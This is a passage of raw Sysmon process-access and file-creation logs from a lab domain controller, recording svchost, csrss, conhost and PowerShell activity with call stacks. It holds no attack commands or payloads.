10341000x80000000000000001800Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.861{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001799Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.861{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001798Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.860{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001797Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.860{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001796Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.859{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001795Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.859{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001794Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.859{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001793Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.859{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001792Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.859{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001791Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.859{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001790Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.859{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001789Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.859{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001788Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.859{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000001787Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.852{10ACEC4A-8551-5FCF-3B00-000000009101}3880C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\Temp\__PSScriptPolicyTest_n4mabzf5.h2e.ps12020-12-08 13:53:21.851 10341000x80000000000000001786Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.847{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001785Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.847{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001784Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.847{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001783Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.847{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001782Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.847{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001781Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.847{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001780Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.846{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001779Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.846{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001778Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.846{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001777Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.840{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-3B00-000000009101}3880C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001776Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.810{10ACEC4A-8551-5FCF-3C00-000000009101}38883908C:\Windows\system32\conhost.exe{10ACEC4A-8551-5FCF-3B00-000000009101}3880C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001775Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.805{10ACEC4A-853E-5FCF-0500-000000009101}644660C:\Windows\system32\csrss.exe{10ACEC4A-8551-5FCF-3C00-000000009101}3888C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001774Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 